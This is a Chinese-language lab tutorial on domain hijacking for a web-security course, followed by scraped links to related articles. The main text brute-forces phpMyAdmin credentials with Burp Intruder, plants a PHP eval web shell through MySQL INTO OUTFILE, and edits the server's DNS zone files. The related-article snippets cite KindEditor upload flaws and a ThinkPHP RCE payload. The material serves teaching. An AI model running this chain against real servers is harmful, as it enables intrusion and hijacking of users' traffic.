域名劫持原理与实践

article/2025/9/16 14:04:57

        实验简介:

        实验所属系列:web安全

        实验对象:本科/专科信息安全专业

        相关课程及专业:信息网络安全概论

         实验时数(学分):1学时

         实验类别:实践实验类

        预备知识:

        了解域名及域名劫持

        由于点分十进制的IP地址难于记忆,便出现了域名。由于网络传输中最终还是基于IP,所以必须通过一种机制将IP和域名一一对应起来,这便是DNS。全球总共有13台根域名服务器。

        域名劫持是互联网攻击中常见的一种攻击方式,攻击者通过对DNS服务器进行攻击,或伪造DNS将目标站点解析到别的地址,用户访问该域名时被重定向到别的站点。在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则直接返回假的IP地址或者什么也不做使得请求失去响应,其效果就是对特定的网址不能访问或访问的是假网址。

        域名劫持的原理

        域名劫持的基本原理是用户输入要访问的域名,请求DNS服务器遍历DNS数据库,查找该域名对应的IP地址,将其结果返回给用户。在DNS服务器遍历DNS数据库时,如果修改了该域名对应的IP,便实现了域名劫持。简单来说就是:本来一个域名对应一个IP,当这个域名对应到别的IP上就称为域名劫持。如果知道该域名的真实IP地址,则可以直接用此IP代替域名后进行访问。

    实验目的:

        通过该实验了解域名劫持的原理,完成对邮件服务器的劫持。

        实验环境:

        邮件服务器:Win2003,IP地址:10.1.1.10

        另一台主机地址:10.1.1.253

        测试者:win7,IP地址随机

实验步骤:

        实验中提供了一台邮件服务器,该服务器同时提供DNS服务,测试者通过入侵到该服务器,修改DNS服务中的正向解析与反向解析文件实现劫持。

        首先我们打开 http://mail.test.com,看到一个邮件登录入口。

        

        这里我们先使用burpsuite对该站点进行目录扫描。

        1、配置好IE代理,截取数据包。

        2、右键send to spider。

 

        发现存在phpmyadmin。如果未出现请单击Filter将Hide empty folders(隐藏空文件夹)的勾去掉。

        然后在地址栏添加phpmyadmin,如图:

        接下来对phpmyadmin进行暴力破解,随便输入一个用户名和密码,比如此处我输入:用户名:root 密码:123,页面提示错误,然后查看burpsuite截获到的数据包。

        找到Authorization,选中Basic后边的字符串,进行如下步骤:右键convert selection->base64->base64-decode。

        可以看到刚才输入的用户名和密码。

        右键send to intruder,在Positions选项卡下单击clear$。

        选中root:123,单击add$。

        切换到payloads选项卡下,设置payload type,在add处添加用户名,separator for position1 处添加一个冒号。

        加载桌面上一个密码字典pass.txt,配置如下。

        配置payload processing,如下图:

        去掉payload encoding中的对号。

        单击intruder下的start attack,一段时间后,发现了一个length和其他的不同。

        双击打开,复制红色区域的字符串。

        接下来需要知道网站的路径是什么,一般网站搭建好后都会存在info.php,phpinfo.php,php_info.php等测试文件,一一访问下,发现存在phpinfo.php文件,并得知网站目录为C:/xampp/xampp/htdocs。

        此时需要通过phpmyadmin拿这个站点的shell,选择SQL,输入如下命令,点击执行:

        use mysql;   //使用Mysql数据库

        Create TABLE heetian (heetian1 text NOT NULL);   //创建heetian表,heetian1字段

        Insert INTO heetian(heetian1) VALUES('<?php @eval($_POST[pass]);?>');   //在heetian表中的heetian1字段中添加值为一句话

        select heetian1 from heetian into outfile 'C:/xampp/xampp/htdocs/test.php';   //使用Mysql中outfile函数将其导出到test.php

        Drop TABLE IF EXISTS heetian;   //删除heetian表

 

        执行成功,访问下http://mail.test.com/test.php

        发现返回空白页面,接下来用中国菜刀连接一下。

        接下来我们需要对这台服务器进行域名劫持,将其劫持到一台IP为10.1.1.253的主机上,找到C:\WINDOWS\system32\dns\etc中的test.com.zone和10.1.1.zone。

 

        分别对这两个文件进行编辑,保存。

        右键“虚拟终端”。

        重启下dns服务,输入命令:net stop named和net start named,回车。

        刷新 http://mail.test.com,发现劫持成功。页面会显示为:“欢迎来到合天网安实验室!”

 实验答题:

 


http://chatgpt.dhexx.cn/article/eh42ZfVP.shtml

相关文章

什么是域名劫持?遇到域名劫持要怎么处理

互联网的应用在我们生活、工作中的应用日益加深&#xff0c;在众多设备的加入下&#xff0c;网络环境也也变得更加复杂。因此&#xff0c;我们在运营网站的过程中&#xff0c;常常出现网站无法打开、或者打开后跳转至其他页面的情况&#xff0c;这就是我们常说的域名劫持。 网…

网站域名被劫持、网站dns被劫持 域名跳转到别的网站的解决方法

网站域名被劫持&#xff0c;网站dns被劫持&#xff0c;域名跳转到别的网站怎么解决&#xff1f; 网站域名被劫持&#xff0c;网站dns被劫持&#xff0c;域名跳转到别的网站怎么解决&#xff1f; 出现网站域名跳转到其他网站&#xff0c;这一现象很可能是域名被劫持。 【网站域名…

【教程分享】大数据视频教程

总预览 下载地址 地址&#xff1a;https://pan.baidu.com/s/1ighogyDQDbMN7Wpe5-VSYg 提取码&#xff1a;rv7h

wpe简介

wpe简介   WPE&#xff08;Winsock Packet Editor&#xff09; 它的中文名称是&#xff1a; 网络封包编辑器 在大多数的编程工具中winsock已经封装成一个控件&#xff0c;成为网络编程的控件&#xff0c;是非常方便的&#xff0c;利用这个控件&#xff0c;编程工具就可以编写…

U盘WPE安装原版Win7系统教程

转载链接&#xff1a;https://jingyan.baidu.com/article/e8cdb32b00472537052bad0b.html 制作U盘pe 1.连接一个空U盘 2.打开pe制作工具&#xff0c;选择安装方式为“U盘” 3.选择好“待写入U盘”&#xff0c;然后点击“立即安装进U盘”&#xff0c;其它默认即可 PS&#xff1…

WPE详细教程四 滤镜制作(3)

为了大家能深入了解滤镜的制作&#xff0c;这里再给大家举些例子&#xff0c;供大家参考学习 当FILTER在启动状态时 &#xff0c;ON的按钮会呈现红色。当您启动FILTER时&#xff0c;您随时可以关闭这个视窗。FILTER将会保留在原来的状态&#xff0c;直到您再按一次 on / off 钮…

kindeditor=4.1.5上传漏洞复现

0x00 漏洞描述 漏洞存在于kindeditor编辑器里&#xff0c;你能上传.txt和.html文件&#xff0c;支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中 这里html里面可以嵌套暗链接地址以及嵌套xss。Kindeditor上的uploadbutton.html用于文件上传功能页面&#x…

【vulhub】ThinkPHP5-rce 5.0.22/5.1.29 远程代码执行漏洞复现getshell

漏洞复现&#xff08;5-rce&#xff09; poc&#xff1a; /index.php?sindex/\think\app/invokefunction&functionphpinfo&vars[0]100payload11111: 代码执行 格式&#xff1a; index.php?sindex/think\app/invokefunction&functioncall_user_func_array&am…

java 富文本 xss_KindEditor开源富文本编辑框架XSS漏洞

原标题&#xff1a;KindEditor开源富文本编辑框架XSS漏洞 *原创作者&#xff1a;卫士通 安全服务事业部 天龙&#xff0c;叶龙&#xff0c;本文属FreeBuf原创奖励计划&#xff0c;未经许可禁止转载 001 前言 KindEditor 是一套开源的在线HTML编辑器&#xff0c;主要用于让用户在…

CTFshow——信息收集11-20

Web11 解题方法&#xff1a; 发现本题没有可配置环境&#xff0c;题目提示域名其实也可以隐藏信息&#xff0c;比如ctfshow.com就隐藏了一条信息 我们在网络搜索一个域名服务对ctfshow.com进行查询 查看更多&#xff0c;在TXT记录中发现了flag Web12 解题方法&#xff1a;…

kindeditor=4.1.5文件上传漏洞复现

0x00&#xff1a;背景 KindEditor是一套开源的HTML可视化编辑器&#xff0c;主要用于让用户在网站上获得所见即所得编辑效果&#xff0c;兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。 0x01:漏洞描述 漏洞存在于小于等于kindeditor4.1.5 编辑器里&#xff0c;你能上传…

KindEditor编辑器上传修改拿shell漏洞

法客论坛《team.f4ck.net》 90sec论坛《www.90sec.org》 疯子博客《http://Madman.in》 作者&#xff1a;relywind 影响版本&#xff1a; KindEditor 3.5.2~4.1 漏洞利用&#xff1a; 打开编辑器&#xff0c;将一句话改名为1.jpg 上传图片&#xff0c; 打开文件管理&#xff0c…

kindeditor在服务器上上传图片显示叉叉,什么原因?,kindeditor=4.1.5 文件上传漏洞利用...

kindeditor<4.1.5 文件上传漏洞 - Kindeditor <4.1.5 file upload vulnerability and use 漏洞存影响版本&#xff1a;小于等于4.1.5的kindeditor 编辑器 漏洞影响&#xff1a;上传任意. txt 和. html 文件 漏洞存在动态脚本语言&#xff1a; php/asp/jsp/asp.net 漏洞存…

[应用漏洞]KindEditor<=4.1.5 文件上传漏洞利用

一、KindEditor KindEditor 是一套开源的在线HTML编辑器&#xff0c;主要用于让用户在网站上获得所见即所得编辑效果 二、漏洞介绍 影响版本&#xff1a;KindEditor 3.5.2~4.1 简介&#xff1a;Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,p…

网站漏洞修补 Kindeditor上传漏洞

2019独角兽企业重金招聘Python工程师标准>>> 很多建站公司都在使用Kindeditor开源的图片上传系统&#xff0c;该上传系统是可视化的&#xff0c;采用的开发语言支持asp、aspx、php、jsp,几乎支持了所有的网站可以使用他们的上传系统&#xff0c;对浏览器的兼容以及手…

Kindeditor 漏洞导致网站被植入木马文件的解决办法

很多建站公司都在使用Kindeditor开源的图片上传系统&#xff0c;该上传系统是可视化的&#xff0c;采用的开发语言支持asp、aspx、php、jsp,几乎支持了所有的网站可以使用他们的上传系统&#xff0c;对浏览器的兼容以及手机端也是比较不错的&#xff0c;用户使用以及编辑上传方…

Kindeditor上传漏洞复现(CVE-2017-1002024)

Kindeditor上传漏洞复现&#xff08;CVE-2017-1002024&#xff09; 文章目录 Kindeditor上传漏洞复现&#xff08;CVE-2017-1002024&#xff09;1. 漏洞简述2. 组件概述3. 漏洞原理4. 漏洞复现5. 漏洞验证5. 漏洞修复意见 复现环境下载地址 土豪专用下载链接 https://download.…

KindEditor 文件上传漏洞验证

KindEditor 文件上传漏洞 漏洞描述影响范围漏洞验证漏洞修复 漏洞描述 漏洞存在于KindEditor编辑器里&#xff0c;你能上传.txt和.html文件&#xff0c;支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.5编辑器中。 这里html里面可以嵌套暗链接地址以及嵌套xss。Ki…

[渗透]kindeditor4.1.5文件上传漏洞

漏洞等级&#xff1a;高危 Kindeditor是一套开源的HTML可视化编辑器&#xff0c;主要用于让用户在网站上获得所见即所得编辑效果&#xff0c;兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。 漏洞描述&#xff1a; Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html…

利用KindEditor漏洞上传网马

KindEditor是常用的富文本编辑器&#xff0c;里边有上传的功能&#xff0c;如果上传文件类型控制的不好&#xff0c;可能就会给网站带来安全问题&#xff0c;比如上传了网马&#xff0c;可能对我们的服务器就造成了伤害。 首先通过搜索引擎查到使用kindeditor的位置&#xff0c…